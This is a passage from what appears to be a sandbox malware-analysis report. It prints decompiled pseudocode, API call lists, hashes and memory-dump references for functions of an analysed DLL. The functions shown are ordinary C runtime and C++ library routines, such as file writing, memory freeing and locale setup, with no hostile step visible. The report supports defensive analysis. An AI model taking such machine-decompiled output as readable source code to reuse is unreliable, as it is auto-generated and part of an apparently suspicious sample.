												 *((intOrPtr*)( *((intOrPtr*)(0x6e2e36b0 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t246;
												goto L31;
											}
											E6E20BB48(GetLastError());
											 *( *((intOrPtr*)(0x6e2e36b0 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x6e2e36b0 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E6E2140BD( *_t190);
											L10:
											goto L2;
										}
									}
									_t270 = _t134;
									goto L22;
								} else {
									_t270 = E6E20AFD6(_t205,  *_t190);
									__eflags = _t270;
									if(__eflags != 0) {
										L22:
										E6E20A9DC(__eflags,  *_t190);
										return _t270;
									}
									goto L20;
								}
							}
							_t271 = GetLastError();
							E6E20BB48(_t271);
							 *( *((intOrPtr*)(0x6e2e36b0 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x6e2e36b0 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E6E20BB7E())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x6e2e36b0 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E6E20BB48(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t239 << 2);
						_t197 = 0;
						_t253 = E6E20ADC5();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E6E20BB6B()) =  *_t186 & 0x00000000;
						 *_t190 = _t264;
						 *((intOrPtr*)(E6E20BB7E())) = 0x18;
						goto L2;
					}
				} else {
					 *(E6E20BB6B()) =  *_t188 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E6E20BB7E()));
				}
			}






















































    0x6e20b102
    0x6e20b125
    0x6e20b129
    0x6e20b12a
    0x6e20b12a
    0x6e20b12a
    0x6e20b12c
    0x6e20b132
    0x6e20b14d
    0x6e20b152
    0x6e20b155
    0x6e20b157
    0x6e20b159
    0x6e20b178
    0x6e20b17f
    0x6e20b186
    0x6e20b189
    0x6e20b195
    0x6e20b198
    0x6e20b1a0
    0x6e20b1a1
    0x6e20b1a4
    0x6e20b1a4
    0x6e20b1ab
    0x6e20b1ad
    0x6e20b1b0
    0x6e20b1b8
    0x6e20b1bb
    0x6e20b228
    0x6e20b229
    0x6e20b22f
    0x6e20b231
    0x6e20b27a
    0x6e20b27d
    0x6e20b286
    0x6e20b289
    0x6e20b28c
    0x6e20b28e
    0x6e20b28e
    0x6e20b28e
    0x6e20b27f
    0x6e20b282
    0x6e20b282
    0x6e20b293
    0x6e20b296
    0x6e20b2a2
    0x6e20b2a7
    0x6e20b2b3
    0x6e20b2bd
    0x6e20b2c1
    0x6e20b2cb
    0x6e20b2ce
    0x6e20b2d9
    0x6e20b2de
    0x6e20b2ee
    0x6e20b2f1
    0x6e20b2f5
    0x6e20b2f6
    0x6e20b2fc
    0x6e20b301
    0x6e20b304
    0x6e20b306
    0x6e20b308
    0x6e20b30d
    0x6e20b310
    0x6e20b312
    0x6e20b33c
    0x6e20b360
    0x6e20b364
    0x6e20b368
    0x6e20b36a
    0x6e20b36e
    0x6e20b370
    0x6e20b37a
    0x6e20b37d
    0x6e20b384
    0x6e20b384
    0x6e20b384
    0x6e20b384
    0x6e20b36e
    0x6e20b389
    0x6e20b395
    0x6e20b397
    0x6e20b422
    0x6e20b422
    0x00000000
    0x6e20b39d
    0x6e20b39d
    0x6e20b3a1
    0x00000000
    0x00000000
    0x6e20b3a6
    0x6e20b3b8
    0x6e20b3c0
    0x6e20b3c3
    0x6e20b3c4
    0x6e20b3c7
    0x6e20b3ce
    0x6e20b3d3
    0x6e20b3d6
    0x6e20b40a
    0x6e20b414
    0x6e20b414
    0x6e20b41e
    0x00000000
    0x6e20b41e
    0x6e20b3df
    0x6e20b3f8
    0x6e20b3ff
    0x6e20b222
    0x00000000
    0x6e20b222
    0x6e20b397
    0x6e20b314
    0x00000000
    0x6e20b2e0
    0x6e20b2e7
    0x6e20b2ea
    0x6e20b2ec
    0x6e20b316
    0x6e20b318
    0x00000000
    0x6e20b31e
    0x00000000
    0x6e20b2ec
    0x6e20b2de
    0x6e20b239
    0x6e20b23c
    0x6e20b257
    0x6e20b25c
    0x6e20b262
    0x6e20b264
    0x6e20b26f
    0x6e20b26f
    0x00000000
    0x6e20b264
    0x6e20b1bd
    0x6e20b1c4
    0x6e20b1c6
    0x6e20b1fd
    0x6e20b1fd
    0x6e20b207
    0x6e20b20a
    0x6e20b211
    0x6e20b211
    0x6e20b211
    0x6e20b21d
    0x00000000
    0x6e20b21d
    0x6e20b1c8
    0x6e20b1cc
    0x00000000
    0x00000000
    0x6e20b1ce
    0x6e20b1dd
    0x6e20b1e2
    0x6e20b1e5
    0x6e20b1e6
    0x6e20b1e9
    0x6e20b1e9
    0x6e20b1f0
    0x6e20b1f2
    0x6e20b1f5
    0x6e20b1f8
    0x6e20b1fb
    0x00000000
    0x00000000
    0x00000000
    0x6e20b15b
    0x6e20b160
    0x6e20b163
    0x6e20b16a
    0x00000000
    0x6e20b16a
    0x6e20b134
    0x6e20b139
    0x6e20b13f
    0x6e20b141
    0x00000000
    0x6e20b146

    APIs
      • Part of subcall function 6E20ADC5: CreateFileW.KERNEL32(00000000,00000000,?,6E20B1AB,?,?,00000000,?,6E20B1AB,00000000,0000000C), ref: 6E20ADE2
    • GetLastError.KERNEL32 ref: 6E20B216
    • __dosmaperr.LIBCMT ref: 6E20B21D
    • GetFileType.KERNEL32(00000000), ref: 6E20B229
    • GetLastError.KERNEL32 ref: 6E20B233
    • __dosmaperr.LIBCMT ref: 6E20B23C
    • CloseHandle.KERNEL32(00000000), ref: 6E20B25C
    • CloseHandle.KERNEL32(?), ref: 6E20B3A6
    • GetLastError.KERNEL32 ref: 6E20B3D8
    • __dosmaperr.LIBCMT ref: 6E20B3DF
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
    • String ID: H
    • API String ID: 4237864984-2852464175
    • Opcode ID: aef480fe7726399023a7e296ed08664d0db7dd9f44c7024aa3fbe64577098750
    • Instruction ID: 4b0f7def10db556b40444f21aa95f03382fd6dfd09e4b8a3913ee645e9103fdc
    • Opcode Fuzzy Hash: aef480fe7726399023a7e296ed08664d0db7dd9f44c7024aa3fbe64577098750
    • Instruction Fuzzy Hash: 04A13432A1415D9FCF298FB8C855BEE7BB6EB06325F140159E811EB3D8CB318916CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E202171, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 54COMMON
    Download Yara Rule
    C-Code - Quality: 79%
    			E6E202171(void* __eflags) {
				void* _t55;
				intOrPtr* _t62;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t72;
				void* _t74;

				_push(0x14);
				E6E204493();
				E6E2017C2(_t74 - 0x14, 0);
				_t71 =  *0x6e2e2e54; // 0x0
				 *(_t74 - 4) =  *(_t74 - 4) & 0x00000000;
				 *(_t74 - 0x10) = _t71;
				_t70 = E6E1FE8D0( *((intOrPtr*)(_t74 + 8)), E6E1FB050(0x6e2e2e48));
				if(_t70 != 0) {
					L5:
					E6E20181A(_t74 - 0x14);
					E6E20446D();
					return _t70;
				} else {
					if(_t71 == 0) {
						_push( *((intOrPtr*)(_t74 + 8)));
						_push(_t74 - 0x10);
						__eflags = E6E202651(_t69, _t71) - 0xffffffff;
						if(__eflags == 0) {
							_t62 = _t74 - 0x20;
							E6E1FA1E0(_t62);
							E6E2059BC(_t74 - 0x20, 0x6e248e6c);
							asm("int3");
							_push(8);
							E6E204493();
							_t72 = _t62;
							 *((intOrPtr*)(_t74 - 0x14)) = _t72;
							 *(_t74 - 0x10) =  *(_t74 - 0x10) & 0x00000000;
							__eflags =  *(_t74 + 0x10);
							if( *(_t74 + 0x10) != 0) {
								 *_t72 = 0x6e23b3c4;
								 *((intOrPtr*)(_t72 + 8)) = 0x6e23b3b8;
								_t20 = _t74 - 4;
								 *_t20 =  *(_t74 - 4) & 0x00000000;
								__eflags =  *_t20;
								 *(_t74 - 0x10) = 1;
							}
							 *((intOrPtr*)(_t72 +  *((intOrPtr*)( *_t72 + 4)))) = 0x6e23b3c0;
							_t28 =  *((intOrPtr*)( *_t72 + 4)) - 8; // -8
							 *((intOrPtr*)( *((intOrPtr*)( *_t72 + 4)) + _t72 - 4)) = _t28;
							__eflags =  *((intOrPtr*)( *_t72 + 4)) + _t72;
							E6E2029AC(_t55,  *((intOrPtr*)( *_t72 + 4)) + _t72, _t69, _t70,  *((intOrPtr*)( *_t72 + 4)) + _t72,  *((intOrPtr*)(_t74 + 8)),  *((intOrPtr*)(_t74 + 0xc)));
							E6E20446D();
							return _t72;
						} else {
							_t70 =  *(_t74 - 0x10);
							 *(_t74 - 0x10) = _t70;
							 *(_t74 - 4) = 1;
							E6E201E08(__eflags, _t70);
							 *0x6e2211c4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 4))))();
							 *0x6e2e2e54 = _t70;
							goto L5;
						}
					} else {
						_t70 = _t71;
						goto L5;
					}
				}
			}










    0x6e202171
    0x6e202178
    0x6e202182
    0x6e202187
    0x6e202192
    0x6e202196
    0x6e2021a7
    0x6e2021ab
    0x6e2021f0
    0x6e2021f3
    0x6e2021fa
    0x6e2021ff
    0x6e2021ad
    0x6e2021af
    0x6e2021b5
    0x6e2021bb
    0x6e2021c3
    0x6e2021c6
    0x6e202200
    0x6e202203
    0x6e202211
    0x6e202216
    0x6e202217
    0x6e20221e
    0x6e202223
    0x6e202225
    0x6e202228
    0x6e20222c
    0x6e202230
    0x6e202232
    0x6e202238
    0x6e20223f
    0x6e20223f
    0x6e20223f
    0x6e202243
    0x6e202243
    0x6e202255
    0x6e202261
    0x6e202264
    0x6e20226d
    0x6e20226f
    0x6e202276
    0x6e20227b
    0x6e2021c8
    0x6e2021c8
    0x6e2021cb
    0x6e2021cf
    0x6e2021d3
    0x6e2021e0
    0x6e2021e8
    0x6e2021ea
    0x00000000
    0x6e2021ea
    0x6e2021b1
    0x6e2021b1
    0x00000000
    0x6e2021b1
    0x6e2021af

    APIs
    • __EH_prolog3.LIBCMT ref: 6E202178
    • std::_Lockit::_Lockit.LIBCPMT ref: 6E202182
    • int.LIBCPMTD ref: 6E202199
      • Part of subcall function 6E1FB050: std::_Lockit::_Lockit.LIBCPMT ref: 6E1FB066
      • Part of subcall function 6E1FB050: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1FB090
    • codecvt.LIBCPMT ref: 6E2021BC
    • std::_Facet_Register.LIBCPMT ref: 6E2021D3
    • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2021F3
    • std::bad_alloc::bad_alloc.LIBCMTD ref: 6E202203
    • __CxxThrowException@8.LIBVCRUNTIME ref: 6E202211
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_alloc::bad_alloc
    • String ID: H..n
    • API String ID: 3310255495-3963257175
    • Opcode ID: 4a467012700c541e2b3b9af2263ffd09411d50bbb3535d6a068eb707d9df482f
    • Instruction ID: 05ca5d508303b7c0450113801d390791d5fe628037591b2c1101551081d21c00
    • Opcode Fuzzy Hash: 4a467012700c541e2b3b9af2263ffd09411d50bbb3535d6a068eb707d9df482f
    • Instruction Fuzzy Hash: F111A37690012E9BCB05DBE4C854AEDB7BBAF48718F140809E5106B2D1DF74AE4697D1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20F8E6, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E20F8E6(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6e23f5b0) {
					E6E20FBB2(_t52);
					_t26 = _a4;
				}
				E6E20FBB2( *((intOrPtr*)(_t26 + 0x3c)));
				E6E20FBB2( *((intOrPtr*)(_a4 + 0x30)));
				E6E20FBB2( *((intOrPtr*)(_a4 + 0x34)));
				E6E20FBB2( *((intOrPtr*)(_a4 + 0x38)));
				E6E20FBB2( *((intOrPtr*)(_a4 + 0x28)));
				E6E20FBB2( *((intOrPtr*)(_a4 + 0x2c)));
				E6E20FBB2( *((intOrPtr*)(_a4 + 0x40)));
				E6E20FBB2( *((intOrPtr*)(_a4 + 0x44)));
				E6E20FBB2( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6E20F7AC(5,  &_v8);
				_v8 =  &_a4;
				return E6E20F7FC(4,  &_v8);
			}




    0x6e20f8ec
    0x6e20f8ef
    0x6e20f8f7
    0x6e20f8fa
    0x6e20f8ff
    0x6e20f902
    0x6e20f906
    0x6e20f911
    0x6e20f91c
    0x6e20f927
    0x6e20f932
    0x6e20f93d
    0x6e20f948
    0x6e20f953
    0x6e20f961
    0x6e20f969
    0x6e20f972
    0x6e20f97a
    0x6e20f98e

    APIs
    • _free.LIBCMT ref: 6E20F8FA
      • Part of subcall function 6E20FBB2: HeapFree.KERNEL32(00000000,00000000,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4), ref: 6E20FBC8
      • Part of subcall function 6E20FBB2: GetLastError.KERNEL32(6E1F73C4,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4,6E1F73C4), ref: 6E20FBDA
    • _free.LIBCMT ref: 6E20F906
    • _free.LIBCMT ref: 6E20F911
    • _free.LIBCMT ref: 6E20F91C
    • _free.LIBCMT ref: 6E20F927
    • _free.LIBCMT ref: 6E20F932
    • _free.LIBCMT ref: 6E20F93D
    • _free.LIBCMT ref: 6E20F948
    • _free.LIBCMT ref: 6E20F953
    • _free.LIBCMT ref: 6E20F961
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 39c5305f2ef265d66768191ad35807edd829535f06670cdd9087a5b06e29f05d
    • Instruction ID: e946ef8767b82e8e762d624e9be04b498fb479eb5d46ddf1e557312f546be199
    • Opcode Fuzzy Hash: 39c5305f2ef265d66768191ad35807edd829535f06670cdd9087a5b06e29f05d
    • Instruction Fuzzy Hash: 4011A47A54010CBFEB02DF94C850CDA3BBAFF08254B2144A1B9898F2B1DB71DA909F84
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2141B8, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
    Download Yara Rule
    C-Code - Quality: 63%
    			E6E2141B8(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x6e24b164; // 0x1dc3c76f
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6e2e36b0 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x6e2e36b0 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E6E20B4DD(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x6e2e36b0 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x6e2e36b0 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6e2e36b0 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E6E210644( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6E210644();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								_t45 =  &_v36; // 0x6e21492d
								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											_t55 =  &_v36; // 0x6e21492d
											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6E203D51(_v8 ^ _t136);
			}


































    0x6e2141c0
    0x6e2141c7
    0x6e2141ca
    0x6e2141d2
    0x6e2141d6
    0x6e2141e2
    0x6e2141e5
    0x6e2141e8
    0x6e2141ef
    0x6e2141f7
    0x6e2141fa
    0x6e214200
    0x6e214206
    0x6e21420b
    0x6e21420d
    0x6e214210
    0x6e214215
    0x6e21421f
    0x6e214226
    0x6e214229
    0x6e214230
    0x6e214237
    0x6e214263
    0x6e214289
    0x6e21428b
    0x00000000
    0x6e214265
    0x6e214268
    0x6e21432f
    0x6e21433b
    0x6e214346
    0x6e21434b
    0x6e21426e
    0x6e214275
    0x6e21427a
    0x6e214280
    0x6e214286
    0x00000000
    0x6e214286
    0x6e214280
    0x6e214268
    0x6e214239
    0x6e21423d
    0x6e214240
    0x6e214246
    0x6e214248
    0x6e21424b
    0x6e21424f
    0x6e21428c
    0x6e21428f
    0x6e214290
    0x6e214295
    0x6e21429b
    0x6e2142a1
    0x6e2142b0
    0x6e2142b6
    0x6e2142bc
    0x6e2142c1
    0x6e2142c9
    0x6e2142dd
    0x6e214350
    0x6e214356
    0x6e2142df
    0x6e2142e7
    0x6e2142f0
    0x6e2142f6
    0x00000000
    0x6e2142f8
    0x6e2142fa
    0x6e2142fd
    0x6e214301
    0x6e214316
    0x00000000
    0x6e214318
    0x6e21431c
    0x6e21431e
    0x6e214321
    0x00000000
    0x6e214321
    0x6e21431c
    0x6e214316
    0x6e2142f6
    0x6e2142f0
    0x6e2142dd
    0x6e2142c1
    0x6e21429b
    0x00000000
    0x6e214324
    0x6e214324
    0x6e214358
    0x6e21436a

    APIs
    • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,6E21492D,?,?,?,?,?,?), ref: 6E2141FA
    • __fassign.LIBCMT ref: 6E214275
    • __fassign.LIBCMT ref: 6E214290
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6E2142B6
    • WriteFile.KERNEL32(?,?,00000000,-I!n,00000000,?,?,?,?,?,?,?,?,?,6E21492D,?), ref: 6E2142D5
    • WriteFile.KERNEL32(?,?,00000001,-I!n,00000000,?,?,?,?,?,?,?,?,?,6E21492D,?), ref: 6E21430E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
    • String ID: -I!n
    • API String ID: 1324828854-717375244
    • Opcode ID: 4d7db087e2e0a857935064258c624a9b53375e92a62bc50653c8e8b8a0bc1d00
    • Instruction ID: ff095e861d1f8bbf349be6699026ad8797813f753c3cf54385aa038ba4490dd9
    • Opcode Fuzzy Hash: 4d7db087e2e0a857935064258c624a9b53375e92a62bc50653c8e8b8a0bc1d00
    • Instruction Fuzzy Hash: 2D51D37090424A9FDF10CFE8C855ADEBBFAFF09304F14415AEA69E7241D7309A45CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1F9750, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85COMMON
    Download Yara Rule
    C-Code - Quality: 85%
    			E6E1F9750(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				void* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				char _v56;
				signed int _t39;
				char _t43;
				void* _t50;
				void* _t77;
				signed int _t85;

				_push(0xffffffff);
				_push(E6E21FAE0);
				_push( *[fs:0x0]);
				_t39 =  *0x6e24b164; // 0x1dc3c76f
				_push(_t39 ^ _t85);
				 *[fs:0x0] =  &_v16;
				E6E2017C2( &_v40, 0);
				_v8 = 0;
				_t43 =  *0x6e2e2c80; // 0x2b18c38
				_v20 = _t43;
				_v36 = E6E1FB050(0x6e2e2d78);
				_v28 = E6E1FE8D0(_a4, _v36);
				if(_v28 == 0) {
					if(_v20 == 0) {
						_t50 = E6E1FE560(__ebx, _t77, __edi, __esi,  &_v20, _a4);
						__eflags = _t50 - 0xffffffff;
						if(_t50 != 0xffffffff) {
							_v24 = _v20;
							E6E1F8AE0(_v24);
							_v8 = 1;
							E6E201E08(__eflags, _v24);
							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 4))))();
							 *0x6e2e2c80 = _v20;
							_v28 = _v20;
							E6E2013F0( &_v32);
							_v8 = 0;
							E6E1FA830( &_v32);
						} else {
							E6E1FA1E0( &_v56);
							E6E2059BC( &_v56, 0x6e248e6c);
						}
					} else {
						_v28 = _v20;
					}
				}
				_v44 = _v28;
				_v8 = 0xffffffff;
				E6E20181A( &_v40);
				 *[fs:0x0] = _v16;
				return _v44;
			}


















    0x6e1f9753
    0x6e1f9755
    0x6e1f9760
    0x6e1f9764
    0x6e1f976b
    0x6e1f976f
    0x6e1f977a
    0x6e1f977f
    0x6e1f9786
    0x6e1f978b
    0x6e1f9798
    0x6e1f97a7
    0x6e1f97ae
    0x6e1f97b8
    0x6e1f97ca
    0x6e1f97d2
    0x6e1f97d5
    0x6e1f97f2
    0x6e1f97fc
    0x6e1f9801
    0x6e1f9809
    0x6e1f981c
    0x6e1f9821
    0x6e1f982a
    0x6e1f9830
    0x6e1f9835
    0x6e1f983c
    0x6e1f97d7
    0x6e1f97da
    0x6e1f97e8
    0x6e1f97e8
    0x6e1f97ba
    0x6e1f97bd
    0x6e1f97bd
    0x6e1f97b8
    0x6e1f9844
    0x6e1f9847
    0x6e1f9851
    0x6e1f985c
    0x6e1f9867

    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 6E1F977A
    • int.LIBCPMTD ref: 6E1F9793
      • Part of subcall function 6E1FB050: std::_Lockit::_Lockit.LIBCPMT ref: 6E1FB066
      • Part of subcall function 6E1FB050: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1FB090
    • ctype.LIBCPMTD ref: 6E1F97CA
    • std::bad_alloc::bad_alloc.LIBCMTD ref: 6E1F97DA
    • __CxxThrowException@8.LIBVCRUNTIME ref: 6E1F97E8
    • std::_Lockit::~_Lockit.LIBCPMT ref: 6E1F9851
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Exception@8Throwctypestd::bad_alloc::bad_alloc
    • String ID: x-.n
    • API String ID: 1618461562-509069231
    • Opcode ID: 0e97f7c3da1aa3df4a7e4ab17d04754fc20158179c34df925bed72cc8f80c6f7
    • Instruction ID: 6201ce547f3a28b0df48f6435c6568d3029dfa78574812aba542f36c434b655d
    • Opcode Fuzzy Hash: 0e97f7c3da1aa3df4a7e4ab17d04754fc20158179c34df925bed72cc8f80c6f7
    • Instruction Fuzzy Hash: 4B310AB5D0020DDFCB04DFD8C991AEEBBB5BF58314F204A19E515A7280DB346A85DBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1F9870, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85COMMON
    Download Yara Rule
    C-Code - Quality: 85%
    			E6E1F9870(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				void* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
